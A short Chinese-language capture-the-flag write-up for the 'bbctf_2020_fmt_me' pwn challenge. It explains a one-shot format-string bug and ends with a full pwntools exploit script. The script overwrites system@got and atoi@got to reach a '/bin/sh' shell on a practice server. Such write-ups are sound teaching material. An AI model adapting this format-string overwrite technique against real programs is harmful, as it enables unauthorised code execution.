bbctf_2020_fmt_me

<p>[TOC]</p> <h1>分析</h1> <p><img src="https://pic.imgdb.cn/item/63ad8b6c08b6830163dd4df3.png" alt="" /> </p> <p>只有一个格式化字符串漏洞，而且执行一次，但是给了system函数，所以考虑覆盖system@got为main函数，然后修改get_init()函数里的atoi函数的got表为system@plt[1]，跳过跳转system@got直接解析system真实地址并执行</p> <p><img src="https://pic.imgdb.cn/item/63ad8c3908b6830163de9abc.png" alt="" /> </p> <p>并在fgets输入的时候输入“/bin/sh”获取到shell</p> <h1>Exploit</h1> <pre><code>from pwn import* # o = process('./pwn') o = remote('node4.buuoj.cn', 25732) system_got = 0x404028 system_plt = 0x401056 atoi_got = 0x404058 main = 0x4011F7 o.sendline('2') payload = "%16$n" payload += "%4198486p" + "%17$n" + "%417p" + "%18$n" payload = payload.ljust(0x50, 'a') payload += p64(atoi_got+4) + p64(atoi_got) + p64(system_got) # pause() o.sendline(payload) o.interactive() </code></pre>

oin

bbctf_2020_fmt_me

页面列表